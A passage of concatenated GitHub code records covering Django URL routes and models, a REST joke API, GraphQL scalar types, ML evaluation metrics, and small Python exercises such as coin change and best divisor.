views.WallShow.as_view(), name='wall-show'),\n path('walls/<int:pk>/comments', views.CreateComment.as_view(), name='comments-create'),\n]\n","repo_name":"peregrinebalas/scrawl_be","sub_path":"scrawls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41907761091","text":"import random\nfrom statistics import mean\n\n\nclass RandomizeForColleage:\n __raiting = 0 #avg\n __numbers = 0 #count\n __IsBool = True\n __iterable = 0\n __array = []\n\n def __init__(self, values) -> None:\n self.__numbers = values[0]\n self.__raiting = values[1]\n self.__array.clear()\n \n def get_raiting(self):\n return self.__raiting\n \n def get_numbers(self):\n return self.__numbers\n\n def get_bool(self):\n return self.__IsBool\n \n def get_iter(self):\n return self.__iterable\n\n def __dispose_high_value(self):\n val = self.__raiting * self.__numbers / self.__numbers\n ret_val = 0\n\n for i in range(self.__numbers):\n rnd = random.randint(1, 7)\n self.__array.append(int(val - rnd))\n ret_val = ret_val + rnd\n\n iterable = 0\n while ret_val > 0:\n rnd = random.randint(1, 7)\n\n if(self.__array[iterable] + rnd) < 100:\n if ret_val - rnd < 0:\n ret_val = ret_val * (-1)\n self.__array[iterable] = self.__array[iterable] - ret_val\n break\n\n self.__array[iterable] = self.__array[iterable] + rnd\n ret_val = ret_val - rnd\n\n iterable = iterable + 1\n\n if iterable >= self.__numbers:\n iterable = 0\n\n def __dispose_low_value(self):\n smally_values = []\n\n for i in range(0, len(self.__array)):\n if self.__array[i] < 50:\n smally_values.append(50 - self.__array[i])\n self.__array[i] = 50\n\n for i in range(0, len(smally_values)):\n for j in range(len(self.__array)):\n if self.__array[j] - smally_values[i] > 50 and smally_values[i] > 0:\n self.__array[j] = self.__array[j] - smally_values[i]\n smally_values[i] = 0\n break\n\n print(smally_values)\n\n def __fully_array_set(self, some_value):\n if some_value == 100:\n for i in range(0, self.__numbers):\n self.__array.append(100)\n\n elif some_value == 50:\n for i in range(0, self.__numbers):\n self.__array.append(50)\n\n elif 75 <= some_value < 100:\n if self.__raiting >= 90:\n self.__dispose_high_value()\n return\n\n for i in range(0, self.__numbers):\n self.__array.append(random.randint(60, 100))\n\n elif 75 > some_value > 50:\n for i in range(0, self.__numbers):\n self.__array.append(random.randint(30, 100))\n\n self.__dispose_low_value() \n\n\n def run(self):\n while self.__IsBool:\n self.__fully_array_set(self.__raiting)\n\n if round(mean(self.__array)) == 
self.__raiting:\n self.__iterable += 1\n self.__IsBool = False\n\n return self.__array\n\n self.__array.clear()","repo_name":"rabotyagaya/test","sub_path":"randomize_app.py","file_name":"randomize_app.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9900497440","text":"\"\"\"calculating change\r\nkennedy muranda\r\n17/42014\"\"\"\r\n\r\n#define the function\r\ndef calc_change(change,coin_value): \r\n count=0\r\n while change//coin_value != 0:\r\n count+=1\r\n change-=coin_value\r\n return count\r\n\r\n#prompt user to type in cost\r\ncost=eval(input(\"Enter the cost (in cents):\\n\")) \r\ndeposit=0\r\n\r\nwhile cost>deposit: \r\n deposit=deposit+ eval(input(\"Deposit a coin or note (in cents):\\n\"))\r\n \r\nchange=deposit-cost\r\n\r\nif change!=0:\r\n print(\"Your change is:\") #giving back the change\r\n for i in [100,25,10,5,1]:\r\n coin_number=calc_change(change,i)\r\n change=change-coin_number*i\r\n \r\n if i==100 and coin_number>0:\r\n print(str(coin_number), \"x $1\")\r\n elif coin_number != 0:\r\n print(str(coin_number), \"x\", str(i) + \"c\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/mrnkud004/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15395075363","text":"'''\nKristen loves playing with and comparing numbers. She thinks that if she takes two different positive numbers,\nthe one whose digits sum to a larger number is better than the other.\nIf the sum of digits is equal for both numbers, then she thinks the smaller number is better.\nFor example, Kristen thinks that 13 is better than 31 and that 12 is better than 11.\n\nGiven an integer, can you find the divisor of that Kristin will consider to be the best?\n0<n<=10**5\n'''\nimport math\n\nn = 100\nmax_sum = (math.ceil(math.log10(n)))*9\n\n\ndef get_divisors(n):\n def get_sum(d):\n return sum(list(map(int, list(str(int(d))))))\n\n digit_sum = 1\n\n divisor = 1\n for i in range(1, int(math.ceil(math.sqrt(n + 1)))):\n if not n % i:\n g = n // i\n for d in sorted([i, g]):\n # print(d)\n s = get_sum(d)\n if s > digit_sum:\n divisor = d\n digit_sum = s\n return divisor\n\n\ndef solve(a, b, c):\n if c >= (a + b):\n return '1/1'\n else:\n # c<a+b\n min_ = min(a, b)\n max_ = max(a, b)\n\n if c <= min_:\n deno = 2 * a * b\n nume = pow(c, 2)\n elif c <= max_:\n deno = 2 * max_\n nume = 2 * c - min_\n else:\n deno = 2 * min_\n nume = 2 * c - max_\n nume = int(nume)\n deno = int(deno)\n divisor = math.gcd(nume, deno)\n\n nume = nume // divisor\n deno = deno // divisor\n # print(f'{c:0}/{deno}')\n return f'{nume:.0f}/{deno:.0f}'\n\n\nif __name__ == '__main__':\n n = 12\n print(get_divisors(n))","repo_name":"sylviassoleil/clean_code_python","sub_path":"math/best_divisor.py","file_name":"best_divisor.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20872720","text":"import os\nfrom urllib import request\n\nfrom django.core.files import File\nfrom django.db import models\n\n# Create your models here.\n\n\nclass App(models.Model):\n package_name = models.CharField(max_length=250, null=True, blank=True, db_index=True, unique=True)\n name = models.CharField(max_length=250)\n icon = models.ImageField(null=True, blank=True)\n 
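# presumably flags whether the app currently appears in a top-apps chart\n # (inferred from the field and app names; the scraped source does not say)\n 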
is_top = models.BooleanField(default=True)\n developer = models.CharField(max_length=250, null=True, blank=True)\n\n class Meta:\n app_label = 'top_app'\n\n def get_remote_image(self, url):\n if url and not self.icon:\n result = request.urlretrieve(url)\n # close the downloaded temp file once the image has been saved\n with open(result[0], 'rb') as fh:\n self.icon.save(\n os.path.basename(f'{self.package_name}.jpg'),\n File(fh)\n )\n self.save()\n\n\nclass ScreenShot(models.Model):\n app = models.ForeignKey(App, related_name='screen_shot', db_index=True, on_delete=models.CASCADE)\n url = models.URLField(null=True, blank=True)\n\n class Meta:\n app_label = 'top_app'\n unique_together = ['app', 'url']\n\n\nclass Video(models.Model):\n app = models.ForeignKey(App, related_name='videos', db_index=True, on_delete=models.CASCADE)\n url = models.URLField(null=True, blank=True)\n thumbnail = models.URLField(null=True, blank=True)\n\n class Meta:\n app_label = 'top_app'\n unique_together = ['app', 'url']\n","repo_name":"sureshkpiitk/app_scrap","sub_path":"top_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12613983982","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.decorators import api_view, permission_classes\n\nfrom backend.cars import serializers\n\nfrom .models import Joke\nfrom .serializers import JokeSerializer\n# Create your views here.\n\n# <<<<<<<<<<<<<<< GETS ALL JOKES >>>>>>>>>>>>>>>>>\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef get_all_jokes(request):\n jokes = Joke.objects.all() # retrieves all joke objects\n serializer = JokeSerializer(jokes, many=True) # serializes each joke object\n return Response(serializer.data)\n\n\n\n@api_view(['GET', 'POST'])\n@permission_classes([AllowAny])\ndef user_jokes(request):\n if request.method == 'POST':\n serializer = JokeSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(user=request.user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'GET':\n jokes = Joke.objects.filter(user_id=request.user.id)\n serializer = JokeSerializer(jokes, many=True)\n return Response(serializer.data)\n","repo_name":"Rahk1990/RanDadJokeGen","sub_path":"backend/jokes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13766586954","text":"\"\"\"\r\nClasses for storing and processing evaluation results.\r\n\"\"\"\r\n\r\nimport os\r\n\r\nimport numpy as np\r\nfrom scipy.special import softmax\r\nfrom sklearn.metrics import accuracy_score, mean_squared_error, roc_auc_score, log_loss, confusion_matrix\r\nfrom sklearn.preprocessing import LabelBinarizer\r\n\r\nfrom utils import sigmoid\r\n\r\n\r\nclass EvalResults:\r\n def __init__(self, num_batches, num_samples, store_preds, y_pred_dim, y_true_dim, y_var_type):\r\n \"\"\"\r\n :param num_batches: number of batches of data that will be used for evaluation\r\n :param num_samples: number of samples that will be used for evaluation\r\n :param store_preds: whether to store predicted values for each sample\r\n :param y_pred_dim: dimension of predicted values\r\n :param y_true_dim: dimension of ground truth labels\r\n :param y_var_type: type of label variable (continuous or categorical)\r\n \"\"\"\r\n self.num_batches = num_batches\r\n 
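# dimensions and type of the prediction/label arrays allocated below\r\n 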
self.num_samples = num_samples\r\n self.y_pred_dim = y_pred_dim\r\n self.y_true_dim = y_true_dim\r\n self.y_var_type = y_var_type\r\n # number of samples in each batch (useful because size of last batch may be different)\r\n self.batch_sizes = np.zeros(self.num_batches)\r\n self.losses = np.zeros(self.num_batches) # losses per batch\r\n self.sample_counts = np.zeros(self.num_batches)\r\n self.sample_ids, self.y_pred, self.y_true = None, None, None\r\n self.store_preds = store_preds\r\n self.metrics = dict()\r\n if self.store_preds:\r\n self.sample_ids = None\r\n self.y_pred = np.zeros((self.num_samples, self.y_pred_dim))\r\n self.y_true = np.zeros((self.num_samples, self.y_true_dim))\r\n if self.y_var_type == \"categorical\" or self.y_var_type == \"binary\":\r\n self.y_true = self.y_true.astype(int)\r\n\r\n def add_all_preds(self, y_pred, y_true):\r\n self.y_pred = y_pred\r\n self.y_true = y_true\r\n\r\n def save_preds(self, output_dir):\r\n np.save(os.path.join(output_dir, \"y_pred.npy\"), self.y_pred)\r\n np.save(os.path.join(output_dir, \"y_true.npy\"), self.y_true)\r\n\r\n def add_step_result(self, step, loss, preds, batch):\r\n \"\"\"\r\n :param step: current step in evaluation loop\r\n :param loss: loss for the batch of data\r\n :param preds: predicted values for the batch of data\r\n :param batch: the batch of data\r\n \"\"\"\r\n batch_size = len(batch[\"ID\"])\r\n self.batch_sizes[step] = batch_size\r\n self.losses[step] = loss.item()\r\n if self.store_preds:\r\n # index by the running sample offset rather than step * batch_size,\r\n # since the final batch may be smaller than the others\r\n start_idx = int(np.sum(self.batch_sizes[:step]))\r\n end_idx = start_idx + batch_size\r\n _sample_ids = np.array(batch[\"ID\"])\r\n self.sample_ids = _sample_ids if self.sample_ids is None else np.concatenate((self.sample_ids, _sample_ids))\r\n self.y_pred[start_idx:end_idx] = preds.cpu().numpy()\r\n _y_true = batch['y'].numpy()\r\n if len(_y_true.shape) == 1: # reshape to match expected shape\r\n _y_true = _y_true[:, None]\r\n self.y_true[start_idx:end_idx] = _y_true\r\n\r\n def compute_mean_loss(self):\r\n total = np.dot(self.batch_sizes, self.losses)\r\n mean_loss = total / sum(self.batch_sizes)\r\n self.metrics[\"loss\"] = mean_loss\r\n\r\n def add_time_info(self, eval_time):\r\n \"\"\"\r\n :param eval_time: time it took to complete evaluation\r\n \"\"\"\r\n self.metrics[\"time\"] = eval_time\r\n\r\n def compute_metrics(self, metrics, normalize_preds=False):\r\n assert self.store_preds, \"need to store predictions in order to compute metrics\"\r\n for metric_name in metrics:\r\n if metric_name == \"accuracy\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute accuracy for discrete vars\"\r\n # convert y predictions from probs to categories\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n _y_pred = _convert_from_prob_to_class(_y_pred)\r\n self.metrics[\"accuracy\"] = accuracy_score(self.y_true, _y_pred)\r\n elif metric_name == \"AUC\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute AUC for discrete vars\"\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n # if labels are binary and preds are 2-D, take prob's associated with label 1\r\n if self.y_var_type == \"binary\" and len(_y_pred.shape) > 1 and _y_pred.shape[1] == 2:\r\n _y_pred = _y_pred[:, 1]\r\n # check if labels are all the same class --> if so AUC is undefined\r\n if len(np.unique(self.y_true)) == 1:\r\n print(\"WARNING: only 1 class found in y_true, AUC is undefined\")\r\n self.metrics[\"AUC\"] = np.nan\r\n continue\r\n # convert true labels from 
indices to one-hot encodings\r\n _y_true = _idx_to_one_hot(self.y_true)\r\n self.metrics[\"AUC\"] = roc_auc_score(_y_true, _y_pred, multi_class='ovo')\r\n elif metric_name == \"cross_entropy\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute cross entropy for discrete vars\"\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n self.metrics[\"cross_entropy\"] = log_loss(self.y_true, _y_pred)\r\n elif metric_name == \"confusion_matrix\":\r\n assert self.y_var_type in [\"categorical\", \"binary\"], \"can only compute cross entropy for discrete vars\"\r\n # convert y predictions from probs to categories\r\n _y_pred = _normalize_preds(self.y_pred, self.y_var_type) if normalize_preds else self.y_pred\r\n _y_pred = _convert_from_prob_to_class(_y_pred)\r\n self.metrics[\"confusion_matrix\"] = confusion_matrix(self.y_true, _y_pred).tolist()\r\n elif metric_name == \"MSE\":\r\n assert self.y_var_type == \"continuous\", \"can only compute MSE for continuous vars\"\r\n self.metrics[\"MSE\"] = mean_squared_error(self.y_true, self.y_pred)\r\n else:\r\n print(f\"Unrecognized metric name {metric_name}\")\r\n print(\"Exiting...\")\r\n exit(1)\r\n\r\n\r\n# helper functions\r\ndef _convert_from_prob_to_class(y_pred):\r\n if len(y_pred.shape) > 1 and y_pred.shape[1] > 1:\r\n _y_pred = np.argmax(y_pred, axis=1)\r\n else: # binary prediction\r\n _y_pred = y_pred > 0.5\r\n return _y_pred\r\n\r\n\r\ndef _normalize_preds(y_pred, y_var_type):\r\n \"\"\"\r\n Used for when NN outputs logits rather than than sigmoid(logits)\r\n \"\"\"\r\n if y_var_type == \"categorical\":\r\n return softmax(y_pred, axis=1)\r\n # otherwise will be binary\r\n return np.array([sigmoid(pred) for pred in y_pred])\r\n\r\n\r\ndef _idx_to_one_hot(y):\r\n lb = LabelBinarizer()\r\n return lb.fit_transform(y)\r\n","repo_name":"kmatton/contrastive-learning-for-eda","sub_path":"modeling/evaluation/eval_results.py","file_name":"eval_results.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"19857823111","text":"import json\n\nimport core\n\nturned_on = True\n\ndata = []\nmain_input = ''\nmain_output = ''\n\nfunctions = {\"debug\" : core.debug, \"debug_2\" : core.debug_2, \"echo\" : core.echo}\n\n\ndef main(current):\n main_input = input('> ')\n with open(\"core_transfer.json\", 'r') as f:\n data = json.load(f)\n # print(data)\n\n with open(\"core_transfer.json\", 'w+') as f:\n # print(data)\n data['main_input'] = main_input\n # print(data)\n json.dump(data, f)\n\n with open(\"core_transfer.json\", 'r') as f:\n core.update(functions.get(current))\n data = json.load(f)\n main_output = data[\"main_output\"]\n\n print(main_output)\n\n\nif __name__ == '__main__':\n while turned_on:\n current = input(\"> \").lower()\n main(current)\n","repo_name":"4ewhatGIT/peacedeck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12877671227","text":"import numpy as np\nimport utils\nimport sys\nimport base64\nfrom PIL import Image\nfrom io import BytesIO\n\nclass Operations:\n def __init__(self, size, repeatNum, imost=True):\n self.size = size\n self.repeatNum = repeatNum\n self.imgorState = imost\n\n def actionTranslation(self, action):#0-6 = -, 7 = 0, 8-14 = +\n dicty = {0:-0.77, 1:-0.66, 2:-0.55, 3:-0.44, 4:-0.33, 5:-0.22, 6:-0.11, 7:0.0, 
8:0.11, 9:0.22, 10:0.33, 11:0.44, 12:0.55, 13:0.66, 14:0.77}\n return dicty[action]\n\n def argMax(self, action):\n return np.argmax(action)\n\n #Adds Image to the front, removing from the back of the array\n def addImage(self, imageList, image):\n # Insert to the front as a plain list, then trim the oldest frames;\n # integer division keeps the slice index an int\n imageList = [image] + list(imageList)\n del imageList[self.size // self.repeatNum:]\n return imageList\n\n #Takes the image and repeats or adds it in the correct location\n def createExperience(self, imageList, image):\n if len(imageList) == 0:\n output = np.repeat(image, self.repeatNum)\n else:\n output = self.addImage(imageList, image)\n return output, imageList\n\n\n def createImage(self, image):\n output = Image.open(BytesIO(base64.b64decode(image)))\n try:\n output = np.asarray(output) # from PIL image to numpy array\n # output = utils.preprocess(output) # apply the preprocessing\n output = np.array([output]) # the model expects 4D array\n output = output.flatten()\n return output/255.0\n\n except Exception as e:\n print(e)\n sys.exit(1)\n\n def checkReward(self, reward):\n if reward == 0.0:\n return -0.001\n else:\n return reward","repo_name":"marho13/SteeringDockingPaper","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42502598098","text":"\"\"\"\n This module imports GraphQL types from graphql-core, but also defines some\n additional custom types.\n\"\"\"\n\nimport datetime\nimport decimal\nimport json\nfrom typing import Any\nfrom dateutil.parser.isoparser import DEFAULT_ISOPARSER\n\nimport graphql.type\n# Had to disable pylint below, because \"No name '...' in module '...'\"\nfrom graphql.language.ast import ValueNode, StringValueNode # pylint: disable=no-name-in-module\nfrom graphql.language.printer import print_ast\n\n# native scalar types\n\nBoolean = graphql.type.GraphQLBoolean\nInt = graphql.type.GraphQLInt\nFloat = graphql.type.GraphQLFloat\nString = graphql.type.GraphQLString\n\n# native scalar wrappers\n\nUnion = graphql.type.GraphQLUnionType\nList = graphql.type.GraphQLList\nNonNull = graphql.type.GraphQLNonNull\n\n# decimal type\n\ndef serialize_decimal(output_value: decimal.Decimal) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return str(output_value)\n\ndef parse_decimal_value(input_value: Any) -> decimal.Decimal:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return decimal.Decimal(input_value)\n except Exception as error:\n raise ValueError(\n f'Cannot parse Decimal from: {repr(input_value)}, got: {error}') from error\n\ndef parse_decimal_literal(value_node: ValueNode, _variables: Any = None) -> decimal.Decimal:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"Decimal should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_decimal_value(value_node.value)\n\nDecimal = graphql.type.GraphQLScalarType(\n name = 'Decimal',\n description = 'A decimal (fixed-point)',\n serialize = serialize_decimal,\n parse_value = parse_decimal_value,\n parse_literal = parse_decimal_literal,\n)\n\n# datetime type\n\ndef serialize_datetime(output_value: datetime.datetime) -> str:\n \"\"\" Serializes an internal value to include in a response. 
\"\"\"\n return output_value.isoformat()\n\ndef parse_datetime_value(input_value: Any) -> datetime.datetime:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return DEFAULT_ISOPARSER.isoparse(input_value)\n except Exception as error:\n raise ValueError(\n f'Cannot parse DateTime from: {repr(input_value)}, got: {error}') from error\n\ndef parse_datetime_literal(value_node: ValueNode, _variables: Any = None) -> datetime.datetime:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"DateTime should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_datetime_value(value_node.value)\n\nDateTime = graphql.type.GraphQLScalarType(\n name = 'DateTime',\n description = 'A datetime element, serialized in standard \"YYYY-MM-DDThh:ii::ss.mmmmmm\" format',\n serialize = serialize_datetime,\n parse_value = parse_datetime_value,\n parse_literal = parse_datetime_literal,\n)\n\n# date type\n\ndef serialize_date(output_value: datetime.date) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return output_value.isoformat()\n\ndef parse_date_value(input_value: Any) -> datetime.date:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return DEFAULT_ISOPARSER.parse_isodate(input_value)\n except Exception as error:\n raise ValueError(f'Cannot parse Date from: {repr(input_value)}, got: {error}') from error\n\ndef parse_date_literal(value_node: ValueNode, _variables: Any = None) -> datetime.date:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"Date should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_date_value(value_node.value)\n\nDate = graphql.type.GraphQLScalarType(\n name = 'Date',\n description = 'A date element, serialized in standard \"YYYY-MM-DD\" format',\n serialize = serialize_date,\n parse_value = parse_date_value,\n parse_literal = parse_date_literal,\n)\n\n# time type\n\ndef serialize_time(output_value: datetime.time) -> str:\n \"\"\" Serializes an internal value to include in a response. \"\"\"\n return output_value.isoformat()\n\ndef parse_time_value(input_value: Any) -> datetime.time:\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return DEFAULT_ISOPARSER.parse_isotime(input_value)\n except Exception as error:\n raise ValueError(f'Cannot parse Time from: {repr(input_value)}, got: {error}') from error\n\ndef parse_time_literal(value_node: ValueNode, _variables: Any = None) -> datetime.time:\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"Time should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_time_value(value_node.value)\n\nTime = graphql.type.GraphQLScalarType(\n name = 'Time',\n description = 'A time element, serialized in standard \"hh:ii::ss.mmmmmm\" format',\n serialize = serialize_time,\n parse_value = parse_time_value,\n parse_literal = parse_time_literal,\n)\n\n# JSON type\n\ndef serialize_jsonstring(output_value):\n \"\"\" Serializes an internal value to include in a response. 
\"\"\"\n return json.dumps(output_value)\n\ndef parse_jsonstring_value(input_value):\n \"\"\" Parses an externally provided value to use as an input. \"\"\"\n try:\n return json.loads(input_value)\n except Exception as error:\n raise ValueError(\n f'Cannot parse JSONString from: {repr(input_value)}, got: {error}') from error\n\ndef parse_jsonstring_literal(value_node, _variables = None):\n \"\"\" Parses an externally provided AST value to use as an input. \"\"\"\n if not isinstance(value_node, StringValueNode):\n raise ValueError(\n \"JSONString should be represented as a string in input: \" + print_ast(value_node),\n value_node,\n )\n return parse_jsonstring_value(value_node.value)\n\nJSONString = graphql.type.GraphQLScalarType(\n name = 'JSONString',\n description = 'JSON in a string',\n serialize = serialize_jsonstring,\n parse_value = parse_jsonstring_value,\n parse_literal = parse_jsonstring_literal,\n)\n","repo_name":"bridgermusic/easy-graphql-server","sub_path":"src/easy_graphql_server/graphql_types.py","file_name":"graphql_types.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"31123031853","text":"import random, uuid, math\nfrom typing import NamedTuple\nfrom datetime import date\nimport json\n\nfrom . import saved_mod_data\n\ndef random_player_emoji(rng):\n humanoid = [\"👶\",\"👧\",\"🧒\",\"👦\",\"👩\",\"🧑\",\"👨\",\"👩‍🦱\",\"🧑‍🦱\",\"👨‍🦱\",\"👩‍🦰\",\"🧑‍🦰\",\"👨‍🦰\",\"👱‍♀️\",\n\"👱\",\"👱‍♂️\",\"👩‍🦳\",\"🧑‍🦳\",\"👨‍🦳\",\"👩‍🦲\",\"🧑‍🦲\",\"👨‍🦲\",\"🧔\",\"👵\",\"🧓\",\"👴\",\"👲\",\"👳‍♀️\",\n\"👳\",\"👳‍♂️\",\"🧕\",\"👮‍♀️\",\"👮\",\"👮‍♂️\",\"👷‍♀️\",\"👷\",\"👷‍♂️\",\"💂‍♀️\",\"💂\",\"💂‍♂️\",\"🕵️‍♀️\",\"🕵️\",\n\"🕵️‍♂️\",\"👩‍⚕️\",\"🧑‍⚕️\",\"👨‍⚕️\",\"👩‍🌾\",\"🧑‍🌾\",\"👨‍🌾\",\"👩‍🍳\",\"🧑‍🍳\",\"👨‍🍳\",\"👩‍🎓\",\"🧑‍🎓\",\"👨‍🎓\",\"👩‍🎤\",\n\"🧑‍🎤\",\"👨‍🎤\",\"👩‍🏫\",\"🧑‍🏫\",\"👨‍🏫\",\"👩‍🏭\",\"🧑‍🏭\",\"👨‍🏭\",\"👩‍💻\",\"🧑‍💻\",\"👨‍💻\",\"👩‍💼\",\"🧑‍💼\",\"👨‍💼\",\n\"👩‍🔧\",\"🧑‍🔧\",\"👨‍🔧\",\"👩‍🔬\",\"🧑‍🔬\",\"👨‍🔬\",\"👩‍🎨\",\"🧑‍🎨\",\"👨‍🎨\",\"👩‍🚒\",\"🧑‍🚒\",\"👨‍🚒\",\"👩‍✈️\",\"🧑‍✈️\",\n\"👨‍✈️\",\"👩‍🚀\",\"🧑‍🚀\",\"👨‍🚀\",\"👩‍⚖️\",\"🧑‍⚖️\",\"👨‍⚖️\",\"👰\",\"🏋️\",\"🤵\",\"🤸\",\"👸\",\"🤴\",\"🦸‍♀️\",\"🦸\",\n\"🦸‍♂️\",\"🦹‍♀️\",\"🦹\",\"🦹‍♂️\",\"🤶\",\"🚴\",\"🎅\",\"🧙‍♀️\",\"🧙\",\"🧙‍♂️\",\"🧝‍♀️\",\"🧝\",\"🧝‍♂️\",\"🧛‍♀️\",\"🧛\",\n\"🧛‍♂️\",\"🧟‍♀️\",\"🧟\",\"🧟‍♂️\",\"🧞‍♀️\",\"🧞\",\"🧞‍♂️\",\"🧜‍♀️\",\"🧜\",\"🧜‍♂️\",\"🧚‍♀️\",\"🧚\",\"🧚‍♂️\",\"👼\",\"🤰\",\n\"🤱\",\"🙇‍♀️\",\"🙇\",\"🙇‍♂️\",\"💁‍♀️\",\"💁\",\"💁‍♂️\",\"🙅‍♀️\",\"🙅\",\"🙅‍♂️\",\"🙆‍♀️\",\"🙆\",\"🙆‍♂️\",\"🙋‍♀️\",\"🙋\",\n\"🙋‍♂️\",\"🧏‍♀️\",\"🧏\",\"🧏‍♂️\",\"🤦‍♀️\",\"🤦\",\"🤦‍♂️\",\"🤷‍♀️\",\"🤷\",\"🤷‍♂️\",\"🙎‍♀️\",\"🙎\",\"🙎‍♂️\",\"🙍‍♀️\",\"🙍\",\n\"🙍‍♂️\",\"💇‍♀️\",\"💇\",\"💇‍♂️\",\"💆‍♀️\",\"💆\",\"💆‍♂️\",\"🧖‍♀️\",\"🧖\",\"🧖‍♂️\",\"💅\",\"🤳\",\"💃\",\"🕺\",\"🕴\",\"👩‍🦽\",\n\"🧑‍🦽\",\"👨‍🦽\",\"👩‍🦼\",\"🧑‍🦼\",\"👨‍🦼\",\"🚶‍♀️\",\"🚶\",\"🚶‍♂️\",\"👩‍🦯\",\"🧑‍🦯\",\"👨‍🦯\",\"🧎‍♀️\",\"🧎\",\"🧎‍♂️\",\"🏃‍♀️\",\"🏃\",\n\"🏃‍♂️\",\"🧍‍♀️\",\"🧍\",\"🧍‍♂️\",\"👭\",\"🧑‍🤝‍🧑\",\"👬\",\"👫\",\"👩‍❤️‍👩\",\"💑\",\"👨‍❤️‍👨\",\"👩‍❤️‍👨\",\"👩‍❤️‍💋‍👩\",\"💏\",\"👨‍❤️‍💋‍👨\",\"👩‍❤️‍💋‍👨\",\n\"👪\",\"👨‍👩‍👦\",\"👨‍👩‍👧\",\"👨‍👩‍👧‍👦\",\"👨‍👩‍👦‍👦\",\"👨‍👩‍👧‍👧\",\"👨‍👨‍👦\",\"👨‍👨‍👧\",\"👨‍👨‍👧‍👦\",\"👨‍👨‍👦‍👦\",\"👨‍👨‍👧‍👧\",\"👩‍👩‍👦\",\"👩‍👩‍👧\",\"👩‍👩‍👧‍👦\",\"👩‍👩‍👦‍👦\",\"👩‍👩‍👧‍👧\",\n\"👨‍👦\",\"👨‍👦‍👦\",\"👨‍👧\",\"👨‍👧‍👦\",\"👨‍👧‍👧\",\"👩‍👦\",\"👩‍👦‍👦\",\"👩‍👧\",\"👩‍👧‍👦\",\"👩‍👧‍👧\",\"🗣\",\"👤\",\"👥\"]\n\n 
